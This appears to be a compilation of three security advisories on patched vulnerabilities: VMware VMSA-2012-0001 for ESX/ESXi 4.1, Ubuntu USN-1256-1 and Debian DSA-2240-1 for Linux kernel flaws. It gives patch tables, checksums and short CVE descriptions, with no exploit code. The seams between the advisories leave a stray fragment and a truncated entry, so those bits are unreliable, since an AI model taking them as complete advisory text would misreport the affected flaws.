ESX updates to third party library and ESX Service\n   Console address several security issues. \n\n2. Relevant releases\n\n   ESXi 4.1 without patch ESXi410-201201401-SG\n\n   ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,\n                           ESX410-201201404-SG, ESX410-201201405-SG,\n                           ESX410-201201406-SG, ESX410-201201407-SG\n\n3. Problem Description\n\n a. ESX third party update for Service Console kernel\n\n    The ESX Service Console Operating System (COS) kernel is updated to\n    kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the\n    COS kernel. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201401-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. ESX third party update for Service Console cURL RPM\n\n    The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9\n    resolving a security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201402-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. ESX third party update for Service Console nspr and nss RPMs\n\n    The ESX Service Console (COS) nspr and nss RPMs are updated to\n    nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving\n    a security issues. \n\n    A Certificate Authority (CA) issued fraudulent SSL certificates and\n    Netscape Portable Runtime (NSPR) and Network Security Services (NSS)\n    contain the built-in tokens of this fraudulent Certificate\n    Authority. This update renders all SSL certificates signed by the\n    fraudulent CA as untrusted for all uses. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201404-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n d. ESX third party update for Service Console rpm RPMs\n\n    The ESX Service Console Operating System (COS) rpm packages are\n    updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,\n    rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2\n    which fixes multiple security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201406-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n e. ESX third party update for Service Console samba RPMs\n\n    The ESX Service Console Operating System (COS) samba packages are\n    updated to samba-client-3.0.33-3.29.el5_7.4,\n    samba-common-3.0.33-3.29.el5_7.4 and\n    libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security\n    issues in the Samba client. \n\n    Note that ESX does not include the Samba Web Administration Tool\n    (SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and\n    CVE-2011-2694. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201407-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n f. ESX third party update for Service Console python package\n\n    The ESX Service Console (COS) python package is updated to\n    2.4.3-44 which fixes multiple security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201405-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n g. ESXi update to third party component python\n\n    The python third party library is updated to python 2.5.6 which\n    fixes multiple security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           5.0       ESXi     patch pending\n    ESXi           4.1       ESXi     ESXi410-201201401-SG\n    ESXi           4.0       ESXi     patch pending\n    ESXi           3.5       ESXi     patch pending\n\n    ESX            4.1       ESX      not affected\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware ESXi 4.1\n   ---------------\n   ESXi410-201201401\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: BDF86F10A973346E26C9C2CD4C424E88    \n   sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F\n   http://kb.vmware.com/kb/2009143\n   ESXi410-201201401 contains ESXi410-201201401-SG\n\n   VMware ESX 4.1\n   --------------\n   ESX410-201201001\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F    \n   sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC\n   http://kb.vmware.com/kb/2009142\n\n   ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,\n   ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and\n   ESX410-201201407-SG\n\n5. References\n\n   CVE numbers\n\n   --- COS Kernel ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901\n   --- COS cURL ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192\n   --- COS rpm ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378\n   --- COS samba ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694\n   --- COS python ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n   --- python library ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n\n ----------------------------------------------------------------------\n\n6. Change log\n\n   2012-01-30 VMSA-2012-0001\n   Initial security advisory in conjunction with the release of patches\n   for ESX 4.1 and ESXi 4.1 on 2012-01-30. \n\n ----------------------------------------------------------------------\n\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2012 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.8.3 (Build 4028)\nCharset: utf-8\n\nwj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8\nf2pLxi537s+ew4dvnYNWlJ8=\n=OAh4\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-1256-1\nNovember 09, 2011\n\nlinux-lts-backport-natty vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux-lts-backport-natty: Linux kernel backport from Natty\n\nDetails:\n\nIt was discovered that the /proc filesystem did not correctly handle\npermission changes when programs executed. A local attacker could hold open\nfiles to examine details about programs running with higher privileges,\npotentially increasing the chances of exploiting additional\nvulnerabilities. (CVE-2011-1020)\n\nVasiliy Kulikov discovered that the Bluetooth stack did not correctly clear\nmemory. A local attacker could exploit this to read kernel stack memory,\nleading to a loss of privacy. (CVE-2011-1078)\n\nVasiliy Kulikov discovered that the Bluetooth stack did not correctly check\nthat device name strings were NULL terminated. A local attacker could\nexploit this to crash the system, leading to a denial of service, or leak\ncontents of kernel stack memory, leading to a loss of privacy. \n(CVE-2011-1079)\n\nVasiliy Kulikov discovered that bridge network filtering did not check that\nname fields were NULL terminated. A local attacker could exploit this to\nleak contents of kernel stack memory, leading to a loss of privacy. \n(CVE-2011-1080)\n\nJohan Hovold discovered that the DCCP network stack did not correctly\nhandle certain packet combinations. A remote attacker could send specially\ncrafted network traffic that would crash the system, leading to a denial of\nservice. (CVE-2011-1093)\n\nPeter Huewe discovered that the TPM device did not correctly initialize\nmemory. A local attacker could exploit this to read kernel heap memory\ncontents, leading to a loss of privacy. (CVE-2011-1160)\n\nDan Rosenberg discovered that the IRDA subsystem did not correctly check\ncertain field sizes. If a system was using IRDA, a remote attacker could\nsend specially crafted traffic to crash the system or gain root privileges. \n(CVE-2011-1180)\n\nRyan Sweat discovered that the GRO code did not correctly validate memory. \nIn some configurations on systems using VLANs, a remote attacker could send\nspecially crafted traffic to crash the system, leading to a denial of\nservice. (CVE-2011-1478)\n\nIt was discovered that the security fix for CVE-2010-4250 introduced a\nregression. A remote attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2011-1479)\n\nDan Rosenberg discovered that the X.25 Rose network stack did not correctly\nhandle certain fields. If a system was running with Rose enabled, a remote\nattacker could send specially crafted traffic to gain root privileges. \n(CVE-2011-1493)\n\nIt was discovered that the Stream Control Transmission Protocol (SCTP)\nimplementation incorrectly calculated lengths. If the net.sctp.addip_enable\nvariable was turned on, a remote attacker could send specially crafted\ntraffic to crash the system. (CVE-2011-1573)\n\nRyan Sweat discovered that the kernel incorrectly handled certain VLAN\npackets. On some systems, a remote attacker could send specially crafted\ntraffic to crash the system, leading to a denial of service. \n(CVE-2011-1576)\n\nTimo Warns discovered that the GUID partition parsing routines did not\ncorrectly validate certain structures. A local attacker with physical\naccess could plug in a specially crafted block device to crash the system,\nleading to a denial of service. (CVE-2011-1577)\n\nPhil Oester discovered that the network bonding system did not correctly\nhandle large queues. On some systems, a remote attacker could send\nspecially crafted traffic to crash the system, leading to a denial of\nservice. (CVE-2011-1581)\n\nIt was discovered that CIFS incorrectly handled authentication. When a user\nhad a CIFS share mounted that required authentication, a local user could\nmount the same share without knowing the correct password. (CVE-2011-1585)\n\nIt was discovered that the GRE protocol incorrectly handled netns\ninitialization. A remote attacker could send a packet while the ip_gre\nmodule was loading, and crash the system, leading to a denial of service. \n(CVE-2011-1767)\n\nIt was discovered that the IP/IP protocol incorrectly handled netns\ninitialization. A remote attacker could send a packet while the ipip module\nwas loading, and crash the system, leading to a denial of service. \n(CVE-2011-1768)\n\nBen Greear discovered that CIFS did not correctly handle direct I/O. A\nlocal attacker with access to a CIFS partition could exploit this to crash\nthe system, leading to a denial of service. (CVE-2011-1771)\n\nTimo Warns discovered that the EFI GUID partition table was not correctly\nparsed. A physically local attacker that could insert mountable devices\ncould exploit this to crash the system or possibly gain root privileges. \n(CVE-2011-1776)\n\nVasiliy Kulikov and Dan Rosenberg discovered that ecryptfs did not\ncorrectly check the origin of mount points. A local attacker could exploit\nthis to trick the system into unmounting arbitrary mount points, leading to\na denial of service. (CVE-2011-1833)\n\nAndrea Righi discovered a race condition in the KSM memory merging support. \nIf KSM was being used, a local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2011-2183)\n\nDan Rosenberg discovered that the IPv4 diagnostic routines did not\ncorrectly validate certain requests. A local attacker could exploit this to\nconsume CPU resources, leading to a denial of service. (CVE-2011-2213)\n\nIt was discovered that an mmap() call with the MAP_PRIVATE flag on\n\"/dev/zero\" was incorrectly handled. A local attacker could exploit this to\ncrash the system, leading to a denial of service. (CVE-2011-2479)\n\nVasiliy Kulikov discovered that taskstats listeners were not correctly\nhandled. A local attacker could expoit this to exhaust memory and CPU\nresources, leading to a denial of service. (CVE-2011-2484)\n\nVasily Averin discovered that the NFS Lock Manager (NLM) incorrectly\nhandled unlock requests. A local attacker could exploit this to cause a\ndenial of service. (CVE-2011-2491)\n\nIt was discovered that Bluetooth l2cap and rfcomm did not correctly\ninitialize structures. A local attacker could exploit this to read portions\nof the kernel stack, leading to a loss of privacy. (CVE-2011-2492)\n\nSami Liedes discovered that ext4 did not correctly handle missing root\ninodes. A local attacker could trigger the mount of a specially crafted\nfilesystem to cause the system to crash, leading to a denial of service. \n(CVE-2011-2493)\n\nVasiliy Kulikov discovered that taskstats did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2494)\n\nVasiliy Kulikov discovered that /proc/PID/io did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2495)\n\nRobert Swiecki discovered that mapping extensions were incorrectly handled. \nA local attacker could exploit this to crash the system, leading to a\ndenial of service. (CVE-2011-2496)\n\nDan Rosenberg discovered that the Bluetooth stack incorrectly handled\ncertain L2CAP requests. If a system was using Bluetooth, a remote attacker\ncould send specially crafted traffic to crash the system or gain root\nprivileges. (CVE-2011-2497)\n\nIt was discovered that the wireless stack incorrectly verified SSID\nlengths. A local attacker could exploit this to cause a denial of service\nor gain root privileges. (CVE-2011-2517)\n\nBen Pfaff discovered that Classless Queuing Disciplines (qdiscs) were being\nincorrectly handled. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2011-2525)\n\nIt was discovered that GFS2 did not correctly check block sizes. A local\nattacker could exploit this to crash the system, leading to a denial of\nservice. (CVE-2011-2689)\n\nIt was discovered that the EXT4 filesystem contained multiple off-by-one\nflaws. A local attacker could exploit this to crash the system, leading to\na denial of service. (CVE-2011-2695)\n\nFernando Gont discovered that the IPv6 stack used predictable fragment\nidentification numbers. A remote attacker could exploit this to exhaust\nnetwork resources, leading to a denial of service. (CVE-2011-2699)\n\nMauro Carvalho Chehab discovered that the si4713 radio driver did not\ncorrectly check the length of memory copies. If this hardware was\navailable, a local attacker could exploit this to crash the system or gain\nroot privileges. (CVE-2011-2700)\n\nHerbert Xu discovered that certain fields were incorrectly handled when\nGeneric Receive Offload (CVE-2011-2723)\n\nChristian Ohm discovered that the perf command looks for configuration\nfiles in the current directory. If a privileged user were tricked into\nrunning perf in a directory containing a malicious configuration file, an\nattacker could run arbitrary commands and possibly gain privileges. \n(CVE-2011-2905)\n\nVasiliy Kulikov discovered that the Comedi driver did not correctly clear\nmemory. A local attacker could exploit this to read kernel stack memory,\nleading to a loss of privacy. (CVE-2011-2909)\n\nThe performance counter subsystem did not correctly handle certain\ncounters. A local attacker could exploit this to crash the system, leading\nto a denial of service. (CVE-2011-2918)\n\nTime Warns discovered that long symlinks were incorrectly handled on Be\nfilesystems. A local attacker could exploit this with a malformed Be\nfilesystem and crash the system, leading to a denial of service. \n(CVE-2011-2928)\n\nQianfeng Zhang discovered that the bridge networking interface incorrectly\nhandled certain network packets. A remote attacker could exploit this to\ncrash the system, leading to a denial of service. (CVE-2011-2942)\n\nDan Kaminsky discovered that the kernel incorrectly handled random sequence\nnumber generation. An attacker could use this flaw to possibly predict\nsequence numbers and inject packets. (CVE-2011-3188)\n\nDarren Lavender discovered that the CIFS client incorrectly handled certain\nlarge values. \n(CVE-2011-3191)\n\nYasuaki Ishimatsu discovered a flaw in the kernel\u0027s clock implementation. A\nlocal unprivileged attacker could exploit this causing a denial of service. \n(CVE-2011-3209)\n\nYogesh Sharma discovered that CIFS did not correctly handle UNCs that had\nno prefixpaths. A local attacker with access to a CIFS partition could\nexploit this to crash the system, leading to a denial of service. \n(CVE-2011-3363)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 10.04 LTS:\n  linux-image-2.6.38-12-generic   2.6.38-12.51~lucid1\n  linux-image-2.6.38-12-generic-pae  2.6.38-12.51~lucid1\n  linux-image-2.6.38-12-server    2.6.38-12.51~lucid1\n  linux-image-2.6.38-12-virtual   2.6.38-12.51~lucid1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If\nyou use linux-restricted-modules, you have to update that package as\nwell to get modules which work with the new kernel version. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-1256-1\n  CVE-2011-1020, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080,\n  CVE-2011-1093, CVE-2011-1160, CVE-2011-1180, CVE-2011-1478,\n  CVE-2011-1479, CVE-2011-1493, CVE-2011-1573, CVE-2011-1576,\n  CVE-2011-1577, CVE-2011-1581, CVE-2011-1585, CVE-2011-1767,\n  CVE-2011-1768, CVE-2011-1771, CVE-2011-1776, CVE-2011-1833,\n  CVE-2011-2183, CVE-2011-2213, CVE-2011-2479, CVE-2011-2484,\n  CVE-2011-2491, CVE-2011-2492, CVE-2011-2493, CVE-2011-2494,\n  CVE-2011-2495, CVE-2011-2496, CVE-2011-2497, CVE-2011-2517,\n  CVE-2011-2525, CVE-2011-2689, CVE-2011-2695, CVE-2011-2699,\n  CVE-2011-2700, CVE-2011-2723, CVE-2011-2905, CVE-2011-2909,\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-12.51~lucid1\n\n\n. (CVE-2010-4242)\n\nBrad Spengler discovered that the kernel did not correctly account for\nuserspace memory allocations during exec() calls. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2240-1                security@debian.org\nhttp://www.debian.org/security/                           dann frazier\nMay 24, 2011                        http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : privilege escalation/denial of service/information leak\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2010-3875 CVE-2011-0695 CVE-2011-0711 CVE-2011-0726\n                 CVE-2011-1016 CVE-2011-1078 CVE-2011-1079 CVE-2011-1080\n                 CVE-2011-1090 CVE-2011-1160 CVE-2011-1163 CVE-2011-1170\n                 CVE-2011-1171 CVE-2011-1172 CVE-2011-1173 CVE-2011-1180\n                 CVE-2011-1182 CVE-2011-1476 CVE-2011-1477 CVE-2011-1478\n                 CVE-2011-1493 CVE-2011-1494 CVE-2011-1495 CVE-2011-1585\n                 CVE-2011-1593 CVE-2011-1598 CVE-2011-1745 CVE-2011-1746\n                 CVE-2011-1748 CVE-2011-1759 CVE-2011-1767 CVE-2011-1770\n                 CVE-2011-1776 CVE-2011-2022\nDebian Bug(s)  : \n                 \nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a denial of service or privilege escalation. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-3875\n\n    Vasiliy Kulikov discovered an issue in the Linux implementation of the\n    Amateur Radio AX.25 Level 2 protocol. \n\nCVE-2011-0695\n\n    Jens Kuehnel reported an issue in the InfiniBand stack. Local\n    users could learn the text location of a process, defeating protections\n    provided by address space layout randomization (ASLR). \n\nCVE-2011-1016\n\n    Marek Ol\u0161\u00e1k discovered an issue in the driver for ATI/AMD Radeon video\n    chips. Local users could pass arbitrary values to video memory and the\n    graphics translation table, resulting in denial of service or escalated\n    privileges. On default Debian installations, this is exploitable only by\n    members of the \u0027video\u0027 group. \n    \nCVE-2011-1080\n\n    Vasiliy Kulikov discovered an issue in the Netfilter subsystem. \n\nCVE-2011-1160\n\n    Peter Huewe reported an issue in the Linux kernel\u0027s support for TPM security\n    chips. \n\nCVE-2011-1163\n\n    Timo Warns reported an issue in the kernel support for Alpha OSF format disk\n    partitions. \n\nCVE-2011-1170\n\n    Vasiliy Kulikov reported an issue in the Netfilter arp table\n    implementation. \n\nCVE-2011-1171\n\n    Vasiliy Kulikov reported an issue in the Netfilter IP table\n    implementation. \n    \nCVE-2011-1172\n\n    Vasiliy Kulikov reported an issue in the Netfilter IP6 table\n    implementation. \n    \nCVE-2011-1173\n\n    Vasiliy Kulikov reported an issue in the Acorn Econet protocol\n    implementation. \n\nCVE-2011-1180\n\n    Dan Rosenberg reported a buffer overflow in the Information Access Service\n    of the IrDA protocol, used for Infrared devices. \n\nCVE-2011-1182\n\n    Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local\n    users can generate signals with falsified source pid and uid information. \n\nCVE-2011-1476\n\n    Dan Rosenberg reported issues in the Open Sound System MIDI interface that\n    allow local users to cause a denial of service. This issue does not affect\n    official Debian Linux image packages as they no longer provide support for\n    OSS.  However, custom kernels built from Debians linux-source-2.6.32 may\n    have enabled this configuration and would therefore be vulnerable. \n\nCVE-2011-1477\n\n    Dan Rosenberg reported issues in the Open Sound System driver for cards that\n    include a Yamaha FM synthesizer chip. This issue does not affect\n    official Debian Linux image packages as they no longer provide support for\n    OSS.  However, custom kernels built from Debians linux-source-2.6.32 may\n    have enabled this configuration and would therefore be vulnerable. \n\nCVE-2011-1478\n\n    Ryan Sweat reported an issue in the Generic Receive Offload (GRO) support in\n    the Linux networking subsystem. \n\nCVE-2011-1493\n\n    Dan Rosenburg reported two issues in the Linux implementation of the Amateur\n    Radio X.25 PLP (Rose) protocol. \n\nCVE-2011-1494\n\n    Dan Rosenberg reported an issue in the /dev/mpt2ctl interface provided by\n    the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian\n    installations this is not exploitable as this interface is only accessible\n    to root. \n\nCVE-2011-1495\n\n    Dan Rosenberg reported two additional issues in the /dev/mpt2ctl interface\n    provided by the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian installations this is not\n    exploitable as this interface is only accessible to root. \n\nCVE-2011-1585\n\n    Jeff Layton reported an issue in the Common Internet File System (CIFS). \n\nCVE-2011-1598\n\n    Dave Jones reported an issue in the Broadcast Manager Controller Area\n    Network (CAN/BCM) protocol that may allow local users to cause a NULL\n    pointer dereference, resulting in a denial of service. \n\nCVE-2011-1745\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian\n    installations, this is exploitable only by users in the video group. \n\nCVE-2011-1746\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is exploitable\n    only by users in the video group. \n\nCVE-2011-1748\n\n    Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw\n    socket implementation which permits ocal users to cause a NULL pointer\n    dereference, resulting in a denial of service. \n    \nCVE-2011-1759\n\n    Dan Rosenberg reported an issue in the support for executing \"old ABI\"\n    binaries on ARM processors. \n\nCVE-2011-1767\n\n    Alexecy Dobriyan reported an issue in the GRE over IP implementation. \n\nCVE-2011-2022\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian\n    installations, this is exploitable only by users in the video group. \n\nThis update also includes changes queued for the next point release of\nDebian 6.0, which also fix various non-security issues. These additional\nchanges are described in the package changelog which can be viewed at:\n\n  http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n2.6.32-34squeeze1. Updates for issues impacting the oldstable distribution\n(lenny) will be available soon. \n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n                                             Debian 6.0 (squeeze)\n     user-mode-linux                         2.6.32-1um-4+34squeeze1\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 